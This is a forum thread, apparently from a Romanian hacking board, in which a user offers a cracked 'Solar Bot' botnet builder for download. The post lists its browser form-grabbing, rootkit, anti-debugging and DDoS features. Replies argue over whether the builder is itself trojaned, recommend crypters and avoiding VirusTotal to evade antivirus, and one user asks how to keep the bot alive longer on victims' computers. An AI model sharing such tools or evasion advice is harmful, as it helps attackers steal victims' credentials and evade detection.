criss84 Posted November 2, 2013 Report Posted November 2, 2013 (edited) Technical DetailsCoded in Lazarus (Pascal)Code is fully relocatable (Shellcode)Uses custom CRC32 API loaderUses BeaEngine Disassembler for x86 and x64Uses named pipes for inter-process communicationMultpiple layers of encryption and compressionGlobal Ring 3 rootkit and No own processFully UnicodeNo dependencies (Only standard system DLLs)Multiple Anti-Debug methodsUnique Server->Bot traffic encryptionAnti bot installationFeaturesInternet Explorer FormgrabberMozilla FireFox FormgrabberGoogle Chrome FormgrabberSPDY GrabbingFTP and POP3 GrabberSlowLoris DDOS and SlowPost DDOSGET FloodUDP DDOSUpdate and Download SystemMD5 Verified Update and Download SystemReverse Socks 5Browse URL (Visible)Browse URL (Hidden)Download: Download Solar Bot Builder.zip from Sendspace.com - send big files the easy way Edited November 2, 2013 by criss84 Quote
bahaosistu Posted November 2, 2013 Report Posted November 2, 2013 ce face exact programul acesta? Quote
bahaosistu Posted November 2, 2013 Report Posted November 2, 2013 crek m-am prins .... il instalezi pe un site.. si cine intra pe el ii baga un keylogger sau cv de genu Quote
bahaosistu Posted November 6, 2013 Report Posted November 6, 2013 nu inteleg ces cu logurile acelea... nu inteleg nimic din ele... nicio parola ..... Quote
Wav3 Posted November 6, 2013 Report Posted November 6, 2013 Omu' ala a muncit la el si tu il pui aici crack-uit? Quote
Brenin Posted November 6, 2013 Report Posted November 6, 2013 Wav3, cei care folosesc builder-uri cracked, sau asemanator cu cel din thread-ul asta, sunt oricum oameni care nu ar fi fost clienti autorului niciodata. Arunca o privire la cele 4 posturi de deasupra ta, zici ca sunt veniti din tiganie )Si SpyEye aparuse cracked in o gramada de feluri, dar asta nu l-a impiedicat pe gribodemon sa aibe 8700 de clienti . Quote
AlMalalah Posted November 6, 2013 Report Posted November 6, 2013 Wav3, cei care folosesc builder-uri cracked, sau asemanator cu cel din thread-ul asta, sunt oricum oameni care nu ar fi fost clienti autorului niciodata. Arunca o privire la cele 4 posturi de deasupra ta, zici ca sunt veniti din tiganie )Si SpyEye aparuse cracked in o gramada de feluri, dar asta nu l-a impiedicat pe gribodemon sa aibe 8700 de clienti .Cum de nu a fost prins si inchis acest gribodemon ca cica este ilegal si sa programez si sa si vinzi astfel de programe nu doar daca le folosesti ? Quote
Brenin Posted November 6, 2013 Report Posted November 6, 2013 NU l-au prins pentru ca e destept, stie sa se ascunda, si inca un mare plus este faptul ca este / locuieste in Rusia, cel putin asa se crede, ceea ce ii ofera un imens avantaj.Daca ai observat in thread-urile lui, si a altor autori de genul asta, specifica foarte foarte clar ca nu sunt de acord cu folosirea acestor tip de malware in zonele CIS cum zic ei, sau mai bine zis in statele independente, unul fiind Russia. drept urmare, autoritatile ruse il ignora, sau cel putin il lasa liber, iar cele internationale nu il pot atinge.Asta nu inseamna ca e vreun Darwin al rusilor, dar pur si simplu, isi respecta oamenii.Ca o paranteza, se suspecta cum ca gribodemon este acelasi cu Monstr / Slavik , autorul botului Zeus, insa nimeni nu a demonstrat asta. Oricum, si acela este tot liber, ultimele sume facute dupa vanzarea lui considerandu-se undeva la 40 MIL. $ Quote
itwell Posted November 26, 2013 Report Posted November 26, 2013 the builder is infectedhttps://www.virustotal.com/en/file/2d3ef6e066a7563b91c2944f81392b719fbfab040a83b8b89623140d492c1a0f/analysis/1385477500/Detection ratio: 30 / 46 Mencioned Trojan.Zbot = Zeus botnetthis line infectedhttp://img546.imageshack.us/img546/2659/slel.pngdelete routes and have a valid report remove lines and verified to work correctlythe builder and clean.http://img818.imageshack.us/img818/921/dst2.pnghttps://www.virustotal.com/en/file/a37b6296c7f151cd95bc5383812bbcbf97783e7511b996ca635fae92800aade8/analysis/1385478715/Detection ratio: 12 / 46 https://anonfiles.com/file/d834686b6cffaa34407d184ee6dac51e Quote
criss84 Posted November 26, 2013 Author Report Posted November 26, 2013 First you must be banned for scanning on VirusTotal ,second the builder is not infected with zeus these links only show your ip dont make anything harmful on your PChttp://ipv4.icanhazip.comhttp://my.ip.dnsomatic.comhttp://api.exip.org?call=iphttp://ip.comax.frhttp://ip1.dynupdate.no-ip.comhttp://ifconfig.me/ip Quote
Darkb0t Posted November 28, 2013 Report Posted November 28, 2013 great tut, thankslearning, post more Quote
Darkb0t Posted November 28, 2013 Report Posted November 28, 2013 First you must be banned for scanning on VirusTotal ,second the builder is not infected with zeus these links only show your ip dont make anything harmful on your PChttp://ipv4.icanhazip.comhttp://my.ip.dnsomatic.comhttp://api.exip.org?call=iphttp://ip.comax.frhttp://ip1.dynupdate.no-ip.comhttp://ifconfig.me/ipand indeed, should be banned, never use VirusTotal, using private scannerthey send reports to companies Antvirus, concertaza new updates for Antvirus in relation to the solar botnet builderhaving to use a good crypter for camouflage Quote
itwell Posted November 28, 2013 Report Posted November 28, 2013 well first check where it connects,http://ipv4.icanhazip.com!Detailed Analysis - Troj/Agent-ADRF - Viruses and Spyware - Threat Analysis - Threat Center - Sophos Quote
Darkb0t Posted December 15, 2013 Report Posted December 15, 2013 software are infected,[shit,X (]features/update,look hereSolar Bot Quote
bozzmann Posted February 13, 2014 Report Posted February 13, 2014 I really like this solar bot! Because it infects all browsers. But the problem i have with this bot is that it sends too many rubbish and nonsense logs to the logs database more than it sends useful logs containing victim's inputs.Please who knows how i can set this bot to send only good and useful logs to logs database?And after victim is infected, this bot dies in victim's computer and stop to send logs after about just 40 minutes of infection.Please how can i make this bot live very longer in the victim's computer? Quote